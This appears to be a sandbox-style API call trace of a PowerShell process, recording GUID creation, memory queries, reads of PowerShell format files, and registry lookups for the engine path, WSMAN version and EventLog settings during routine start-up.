	[0337.624] CoCreateGuid (in: pguid=0x26d170 | out: pguid=0x26d170*(Data1=0x60f09ad6, Data2=0x71e, Data3=0x4ce7, Data4=([0]=0xab, [1]=0xfd, [2]=0x6f, [3]=0x7b, [4]=0xae, [5]=0xc0, [6]=0x12, [7]=0x6f))) returned 0x0
	[0337.625] CoCreateGuid (in: pguid=0x26d170 | out: pguid=0x26d170*(Data1=0xb6cc1f0c, Data2=0x8f1c, Data3=0x4a80, Data4=([0]=0xae, [1]=0xbd, [2]=0x93, [3]=0x29, [4]=0x4e, [5]=0xdf, [6]=0x37, [7]=0xff))) returned 0x0
	[0337.625] CoCreateGuid (in: pguid=0x26d170 | out: pguid=0x26d170*(Data1=0xa16ee618, Data2=0xfb49, Data3=0x444d, Data4=([0]=0x93, [1]=0x7c, [2]=0x85, [3]=0x55, [4]=0x97, [5]=0xa6, [6]=0x54, [7]=0x72))) returned 0x0
	[0337.625] VirtualQuery (in: lpAddress=0x26bb20, lpBuffer=0x26c9e0, dwLength=0x30 | out: lpBuffer=0x26c9e0*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0337.625] CoCreateGuid (in: pguid=0x26d170 | out: pguid=0x26d170*(Data1=0x455d329c, Data2=0x7d8a, Data3=0x48b0, Data4=([0]=0x99, [1]=0x83, [2]=0xe4, [3]=0xa3, [4]=0x94, [5]=0x81, [6]=0x39, [7]=0xe3))) returned 0x0
	[0337.625] VirtualQuery (in: lpAddress=0x26bb20, lpBuffer=0x26c9e0, dwLength=0x30 | out: lpBuffer=0x26c9e0*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0337.626] VirtualQuery (in: lpAddress=0x26bb20, lpBuffer=0x26c9e0, dwLength=0x30 | out: lpBuffer=0x26c9e0*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0337.627] CoCreateGuid (in: pguid=0x26d170 | out: pguid=0x26d170*(Data1=0x92d2ed17, Data2=0x8b4d, Data3=0x439b, Data4=([0]=0xa9, [1]=0x8c, [2]=0xd7, [3]=0x2e, [4]=0xbf, [5]=0xc6, [6]=0xab, [7]=0x60))) returned 0x0
	[0337.627] VirtualQuery (in: lpAddress=0x26bb20, lpBuffer=0x26c9e0, dwLength=0x30 | out: lpBuffer=0x26c9e0*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0337.627] CoCreateGuid (in: pguid=0x26d170 | out: pguid=0x26d170*(Data1=0x5828da8f, Data2=0x618e, Data3=0x4738, Data4=([0]=0x8c, [1]=0x48, [2]=0xdd, [3]=0x35, [4]=0x2b, [5]=0x9b, [6]=0x6b, [7]=0x75))) returned 0x0
	[0337.627] CoCreateGuid (in: pguid=0x26d170 | out: pguid=0x26d170*(Data1=0x3bfa8327, Data2=0xd225, Data3=0x448d, Data4=([0]=0xb8, [1]=0x4b, [2]=0xb, [3]=0xc1, [4]=0xd, [5]=0xd8, [6]=0x4e, [7]=0xa5))) returned 0x0
	[0337.627] CoCreateGuid (in: pguid=0x26d170 | out: pguid=0x26d170*(Data1=0xc45030be, Data2=0x8f80, Data3=0x41b7, Data4=([0]=0xbd, [1]=0xe0, [2]=0xe, [3]=0xe9, [4]=0x97, [5]=0xb0, [6]=0x6, [7]=0x2e))) returned 0x0
	[0337.627] CoCreateGuid (in: pguid=0x26d170 | out: pguid=0x26d170*(Data1=0x34780d10, Data2=0x73ae, Data3=0x45b2, Data4=([0]=0xac, [1]=0x47, [2]=0x1c, [3]=0x25, [4]=0x2b, [5]=0xac, [6]=0x8d, [7]=0x2d))) returned 0x0
	[0337.628] CoCreateGuid (in: pguid=0x26d170 | out: pguid=0x26d170*(Data1=0x585f04f5, Data2=0x2dfd, Data3=0x4eac, Data4=([0]=0xa7, [1]=0xbd, [2]=0x39, [3]=0xad, [4]=0x94, [5]=0x1c, [6]=0x4c, [7]=0xee))) returned 0x0
	[0337.628] CoCreateGuid (in: pguid=0x26d170 | out: pguid=0x26d170*(Data1=0xab0a7e8d, Data2=0x2d59, Data3=0x4432, Data4=([0]=0x93, [1]=0x2, [2]=0xb1, [3]=0xe6, [4]=0x8d, [5]=0xb0, [6]=0xda, [7]=0x60))) returned 0x0
	[0337.628] CoCreateGuid (in: pguid=0x26d170 | out: pguid=0x26d170*(Data1=0xa783f768, Data2=0xa29d, Data3=0x4fe2, Data4=([0]=0xb5, [1]=0x8b, [2]=0x60, [3]=0x12, [4]=0x4c, [5]=0x1b, [6]=0x9a, [7]=0x7e))) returned 0x0
	[0337.628] VirtualQuery (in: lpAddress=0x26bb20, lpBuffer=0x26c9e0, dwLength=0x30 | out: lpBuffer=0x26c9e0*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0337.628] CoCreateGuid (in: pguid=0x26d170 | out: pguid=0x26d170*(Data1=0xf7b5fda9, Data2=0xeaa7, Data3=0x4268, Data4=([0]=0xa1, [1]=0xc5, [2]=0x6f, [3]=0x8c, [4]=0x88, [5]=0x8c, [6]=0x40, [7]=0xb2))) returned 0x0
	[0337.629] CoCreateGuid (in: pguid=0x26d170 | out: pguid=0x26d170*(Data1=0xf720ad8c, Data2=0x494b, Data3=0x47cd, Data4=([0]=0x8b, [1]=0xd1, [2]=0xf7, [3]=0x73, [4]=0x7a, [5]=0xa3, [6]=0xa7, [7]=0x71))) returned 0x0
	[0337.629] CoCreateGuid (in: pguid=0x26d170 | out: pguid=0x26d170*(Data1=0xa0232e3f, Data2=0xd01d, Data3=0x48e2, Data4=([0]=0x99, [1]=0x3c, [2]=0xf8, [3]=0x44, [4]=0xf0, [5]=0x10, [6]=0xa7, [7]=0xcb))) returned 0x0
	[0337.629] CoCreateGuid (in: pguid=0x26d170 | out: pguid=0x26d170*(Data1=0x80b249d3, Data2=0xae19, Data3=0x4bac, Data4=([0]=0xb9, [1]=0x54, [2]=0x4a, [3]=0x84, [4]=0x75, [5]=0x2, [6]=0xf2, [7]=0x4f))) returned 0x0
	[0337.629] CoCreateGuid (in: pguid=0x26d170 | out: pguid=0x26d170*(Data1=0x18c171aa, Data2=0xf53b, Data3=0x4f26, Data4=([0]=0xa8, [1]=0x9b, [2]=0x73, [3]=0x95, [4]=0x92, [5]=0x4a, [6]=0xbf, [7]=0x69))) returned 0x0
	[0337.629] VirtualQuery (in: lpAddress=0x26bb20, lpBuffer=0x26c9e0, dwLength=0x30 | out: lpBuffer=0x26c9e0*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0337.629] CoCreateGuid (in: pguid=0x26d170 | out: pguid=0x26d170*(Data1=0x84fa6cd5, Data2=0xfbd8, Data3=0x4e45, Data4=([0]=0x85, [1]=0xb3, [2]=0x32, [3]=0xfe, [4]=0xc6, [5]=0x7e, [6]=0xee, [7]=0x80))) returned 0x0
	[0337.630] CoCreateGuid (in: pguid=0x26d170 | out: pguid=0x26d170*(Data1=0xd6aff888, Data2=0x1792, Data3=0x4420, Data4=([0]=0x88, [1]=0xa2, [2]=0x5f, [3]=0x5a, [4]=0x8, [5]=0x97, [6]=0x4e, [7]=0x69))) returned 0x0
	[0337.630] VirtualQuery (in: lpAddress=0x26bb90, lpBuffer=0x26ca50, dwLength=0x30 | out: lpBuffer=0x26ca50*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0337.630] VirtualQuery (in: lpAddress=0x26bb90, lpBuffer=0x26ca50, dwLength=0x30 | out: lpBuffer=0x26ca50*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0337.630] VirtualQuery (in: lpAddress=0x26bb90, lpBuffer=0x26ca50, dwLength=0x30 | out: lpBuffer=0x26ca50*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0337.630] VirtualQuery (in: lpAddress=0x26bb90, lpBuffer=0x26ca50, dwLength=0x30 | out: lpBuffer=0x26ca50*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0337.630] SetErrorMode (uMode=0x1) returned 0x1
	[0337.630] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershelltrace.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x304
	[0337.631] SetErrorMode (uMode=0x1) returned 0x1
	[0337.631] GetFileType (hFile=0x304) returned 0x1
	[0337.631] ReadFile (in: hFile=0x304, lpBuffer=0x32a8ed0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26ceb8, lpOverlapped=0x0 | out: lpBuffer=0x32a8ed0*, lpNumberOfBytesRead=0x26ceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0337.632] ReadFile (in: hFile=0x304, lpBuffer=0x32a8ed0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26ceb8, lpOverlapped=0x0 | out: lpBuffer=0x32a8ed0*, lpNumberOfBytesRead=0x26ceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0337.632] ReadFile (in: hFile=0x304, lpBuffer=0x32a8ed0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26ceb8, lpOverlapped=0x0 | out: lpBuffer=0x32a8ed0*, lpNumberOfBytesRead=0x26ceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0337.632] ReadFile (in: hFile=0x304, lpBuffer=0x32a8ed0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26ceb8, lpOverlapped=0x0 | out: lpBuffer=0x32a8ed0*, lpNumberOfBytesRead=0x26ceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0337.632] ReadFile (in: hFile=0x304, lpBuffer=0x32a8ed0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26ceb8, lpOverlapped=0x0 | out: lpBuffer=0x32a8ed0*, lpNumberOfBytesRead=0x26ceb8*=0x8b4, lpOverlapped=0x0) returned 1
	[0337.632] ReadFile (in: hFile=0x304, lpBuffer=0x32a82ec, nNumberOfBytesToRead=0x34c, lpNumberOfBytesRead=0x26ceb8, lpOverlapped=0x0 | out: lpBuffer=0x32a82ec*, lpNumberOfBytesRead=0x26ceb8*=0x0, lpOverlapped=0x0) returned 1
	[0337.632] ReadFile (in: hFile=0x304, lpBuffer=0x32a8ed0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26ceb8, lpOverlapped=0x0 | out: lpBuffer=0x32a8ed0*, lpNumberOfBytesRead=0x26ceb8*=0x0, lpOverlapped=0x0) returned 1
	[0337.632] SetErrorMode (uMode=0x1) returned 0x1
	[0337.632] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershelltrace.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x26ce60 | out: lpFileInformation=0x26ce60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67eea05d, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67eea05d, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe601915b, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x48b4)) returned 1
	[0337.632] SetErrorMode (uMode=0x1) returned 0x1
	[0337.633] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x26cf48 | out: phkResult=0x26cf48*=0x304) returned 0x0
	[0337.633] RegQueryValueExW (in: hKey=0x304, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x26cecc, lpData=0x0, lpcbData=0x26cec8*=0x0 | out: lpType=0x26cecc*=0x1, lpData=0x0, lpcbData=0x26cec8*=0x56) returned 0x0
	[0337.633] CoTaskMemAlloc (cb=0x5a) returned 0x184950
	[0337.633] RegQueryValueExW (in: hKey=0x304, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x26ce9c, lpData=0x184950, lpcbData=0x26ce98*=0x56 | out: lpType=0x26ce9c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x26ce98*=0x56) returned 0x0
	[0337.633] CoTaskMemFree (pv=0x184950) 
	[0337.633] RegCloseKey (hKey=0x304) returned 0x0
	[0337.633] CoCreateGuid (in: pguid=0x26d170 | out: pguid=0x26d170*(Data1=0x818450c4, Data2=0x33c1, Data3=0x4f31, Data4=([0]=0x9f, [1]=0x9c, [2]=0x73, [3]=0xec, [4]=0x0, [5]=0xbc, [6]=0x67, [7]=0x4))) returned 0x0
	[0337.633] CoCreateGuid (in: pguid=0x26d170 | out: pguid=0x26d170*(Data1=0x5b251194, Data2=0x15b0, Data3=0x4b02, Data4=([0]=0xac, [1]=0x24, [2]=0xf4, [3]=0x3d, [4]=0xa1, [5]=0x21, [6]=0x32, [7]=0x8c))) returned 0x0
	[0337.634] SetErrorMode (uMode=0x1) returned 0x1
	[0337.634] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\registry.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x304
	[0337.634] SetErrorMode (uMode=0x1) returned 0x1
	[0337.634] GetFileType (hFile=0x304) returned 0x1
	[0337.634] ReadFile (in: hFile=0x304, lpBuffer=0x32e6cb8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26ceb8, lpOverlapped=0x0 | out: lpBuffer=0x32e6cb8*, lpNumberOfBytesRead=0x26ceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0337.635] ReadFile (in: hFile=0x304, lpBuffer=0x32e6cb8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26ceb8, lpOverlapped=0x0 | out: lpBuffer=0x32e6cb8*, lpNumberOfBytesRead=0x26ceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0337.635] ReadFile (in: hFile=0x304, lpBuffer=0x32e6cb8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26ceb8, lpOverlapped=0x0 | out: lpBuffer=0x32e6cb8*, lpNumberOfBytesRead=0x26ceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0337.635] ReadFile (in: hFile=0x304, lpBuffer=0x32e6cb8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26ceb8, lpOverlapped=0x0 | out: lpBuffer=0x32e6cb8*, lpNumberOfBytesRead=0x26ceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0337.635] ReadFile (in: hFile=0x304, lpBuffer=0x32e6cb8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26ceb8, lpOverlapped=0x0 | out: lpBuffer=0x32e6cb8*, lpNumberOfBytesRead=0x26ceb8*=0xe98, lpOverlapped=0x0) returned 1
	[0337.635] ReadFile (in: hFile=0x304, lpBuffer=0x32e62b8, nNumberOfBytesToRead=0x168, lpNumberOfBytesRead=0x26ceb8, lpOverlapped=0x0 | out: lpBuffer=0x32e62b8*, lpNumberOfBytesRead=0x26ceb8*=0x0, lpOverlapped=0x0) returned 1
	[0337.635] ReadFile (in: hFile=0x304, lpBuffer=0x32e6cb8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26ceb8, lpOverlapped=0x0 | out: lpBuffer=0x32e6cb8*, lpNumberOfBytesRead=0x26ceb8*=0x0, lpOverlapped=0x0) returned 1
	[0337.636] SetErrorMode (uMode=0x1) returned 0x1
	[0337.636] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\registry.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x26ce60 | out: lpFileInformation=0x26ce60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67eea05d, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67eea05d, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe603f2b9, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x4e98)) returned 1
	[0337.636] SetErrorMode (uMode=0x1) returned 0x1
	[0337.636] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x26cf48 | out: phkResult=0x26cf48*=0x304) returned 0x0
	[0337.636] RegQueryValueExW (in: hKey=0x304, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x26cecc, lpData=0x0, lpcbData=0x26cec8*=0x0 | out: lpType=0x26cecc*=0x1, lpData=0x0, lpcbData=0x26cec8*=0x56) returned 0x0
	[0337.636] CoTaskMemAlloc (cb=0x5a) returned 0x184950
	[0337.636] RegQueryValueExW (in: hKey=0x304, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x26ce9c, lpData=0x184950, lpcbData=0x26ce98*=0x56 | out: lpType=0x26ce9c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x26ce98*=0x56) returned 0x0
	[0337.636] CoTaskMemFree (pv=0x184950) 
	[0337.636] RegCloseKey (hKey=0x304) returned 0x0
	[0337.637] VirtualQuery (in: lpAddress=0x26b9e0, lpBuffer=0x26c8a0, dwLength=0x30 | out: lpBuffer=0x26c8a0*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0337.637] CoCreateGuid (in: pguid=0x26d170 | out: pguid=0x26d170*(Data1=0xd7366c4e, Data2=0x8396, Data3=0x4638, Data4=([0]=0xad, [1]=0x2d, [2]=0xfa, [3]=0x2b, [4]=0x62, [5]=0x4f, [6]=0x43, [7]=0xe5))) returned 0x0
	[0337.637] CoCreateGuid (in: pguid=0x26d170 | out: pguid=0x26d170*(Data1=0xc8c626dc, Data2=0xe2f3, Data3=0x465e, Data4=([0]=0x92, [1]=0x6f, [2]=0xe1, [3]=0xd4, [4]=0x49, [5]=0x1d, [6]=0x7d, [7]=0x95))) returned 0x0
	[0338.610] CoTaskMemAlloc (cb=0x104) returned 0xffff0
	[0338.610] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0xffff0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0338.610] CoTaskMemFree (pv=0xffff0) 
	[0338.611] CoTaskMemAlloc (cb=0x104) returned 0xffff0
	[0338.611] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0xffff0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0338.611] CoTaskMemFree (pv=0xffff0) 
	[0338.611] CoTaskMemAlloc (cb=0x104) returned 0xffff0
	[0338.611] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0xffff0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0338.611] CoTaskMemFree (pv=0xffff0) 
	[0338.612] CoTaskMemAlloc (cb=0x104) returned 0xffff0
	[0338.612] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0xffff0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0338.612] CoTaskMemFree (pv=0xffff0) 
	[0338.618] CoTaskMemAlloc (cb=0x104) returned 0xffff0
	[0338.618] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0xffff0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0338.618] CoTaskMemFree (pv=0xffff0) 
	[0338.623] CoTaskMemAlloc (cb=0x104) returned 0xffff0
	[0338.623] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0xffff0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0338.624] CoTaskMemFree (pv=0xffff0) 
	[0338.625] CoTaskMemAlloc (cb=0x104) returned 0xffff0
	[0338.625] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0xffff0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0338.625] CoTaskMemFree (pv=0xffff0) 
	[0338.630] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\WSMAN", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d158 | out: phkResult=0x26d158*=0x304) returned 0x0
	[0338.632] RegQueryInfoKeyW (in: hKey=0x304, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x26d05c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x26d058, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x26d05c*=0x6, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x26d058*=0x3, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0338.632] CoTaskMemFree (pv=0x0) 
	[0338.633] CoTaskMemAlloc (cb=0x204) returned 0x114ad0
	[0338.633] RegEnumValueW (in: hKey=0x304, dwIndex=0x0, lpValueName=0x114ad0, lpcchValueName=0x26d108, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="StackVersion", lpcchValueName=0x26d108, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0338.633] CoTaskMemFree (pv=0x114ad0) 
	[0338.634] CoTaskMemAlloc (cb=0x204) returned 0x114ad0
	[0338.634] RegEnumValueW (in: hKey=0x304, dwIndex=0x1, lpValueName=0x114ad0, lpcchValueName=0x26d108, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="SupportsCompatListeners", lpcchValueName=0x26d108, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0338.634] CoTaskMemFree (pv=0x114ad0) 
	[0338.634] CoTaskMemAlloc (cb=0x204) returned 0x114ad0
	[0338.634] RegEnumValueW (in: hKey=0x304, dwIndex=0x2, lpValueName=0x114ad0, lpcchValueName=0x26d108, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="UpdatedConfig", lpcchValueName=0x26d108, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0338.634] CoTaskMemFree (pv=0x114ad0) 
	[0338.634] RegQueryValueExW (in: hKey=0x304, lpValueName="StackVersion", lpReserved=0x0, lpType=0x26d0ec, lpData=0x0, lpcbData=0x26d0e8*=0x0 | out: lpType=0x26d0ec*=0x1, lpData=0x0, lpcbData=0x26d0e8*=0x8) returned 0x0
	[0338.634] CoTaskMemAlloc (cb=0xc) returned 0x185a20
	[0338.634] RegQueryValueExW (in: hKey=0x304, lpValueName="StackVersion", lpReserved=0x0, lpType=0x26d0bc, lpData=0x185a20, lpcbData=0x26d0b8*=0x8 | out: lpType=0x26d0bc*=0x1, lpData="2.0", lpcbData=0x26d0b8*=0x8) returned 0x0
	[0338.634] CoTaskMemFree (pv=0x185a20) 
	[0339.069] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\WSMAN", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d0a8 | out: phkResult=0x26d0a8*=0x308) returned 0x0
	[0339.069] RegQueryInfoKeyW (in: hKey=0x308, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x26cfac, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x26cfa8, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x26cfac*=0x6, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x26cfa8*=0x3, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0339.070] CoTaskMemFree (pv=0x0) 
	[0339.070] CoTaskMemAlloc (cb=0x204) returned 0x114ad0
	[0339.070] RegEnumValueW (in: hKey=0x308, dwIndex=0x0, lpValueName=0x114ad0, lpcchValueName=0x26d058, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="StackVersion", lpcchValueName=0x26d058, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0339.070] CoTaskMemFree (pv=0x114ad0) 
	[0339.070] CoTaskMemAlloc (cb=0x204) returned 0x114ad0
	[0339.070] RegEnumValueW (in: hKey=0x308, dwIndex=0x1, lpValueName=0x114ad0, lpcchValueName=0x26d058, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="SupportsCompatListeners", lpcchValueName=0x26d058, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0339.070] CoTaskMemFree (pv=0x114ad0) 
	[0339.070] CoTaskMemAlloc (cb=0x204) returned 0x114ad0
	[0339.070] RegEnumValueW (in: hKey=0x308, dwIndex=0x2, lpValueName=0x114ad0, lpcchValueName=0x26d058, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="UpdatedConfig", lpcchValueName=0x26d058, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0339.070] CoTaskMemFree (pv=0x114ad0) 
	[0339.070] RegQueryValueExW (in: hKey=0x308, lpValueName="StackVersion", lpReserved=0x0, lpType=0x26d03c, lpData=0x0, lpcbData=0x26d038*=0x0 | out: lpType=0x26d03c*=0x1, lpData=0x0, lpcbData=0x26d038*=0x8) returned 0x0
	[0339.070] CoTaskMemAlloc (cb=0xc) returned 0x185660
	[0339.070] RegQueryValueExW (in: hKey=0x308, lpValueName="StackVersion", lpReserved=0x0, lpType=0x26d00c, lpData=0x185660, lpcbData=0x26d008*=0x8 | out: lpType=0x26d00c*=0x1, lpData="2.0", lpcbData=0x26d008*=0x8) returned 0x0
	[0339.070] CoTaskMemFree (pv=0x185660) 
	[0339.071] CoTaskMemAlloc (cb=0x104) returned 0xffff0
	[0339.071] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0xffff0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0339.071] CoTaskMemFree (pv=0xffff0) 
	[0339.073] CoTaskMemAlloc (cb=0x104) returned 0xffff0
	[0339.073] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0xffff0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0339.073] CoTaskMemFree (pv=0xffff0) 
	[0339.077] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d0d8 | out: phkResult=0x26d0d8*=0x318) returned 0x0
	[0339.078] RegQueryInfoKeyW (in: hKey=0x318, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x26d04c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x26d048, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x26d04c*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x26d048*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0339.079] CoTaskMemFree (pv=0x0) 
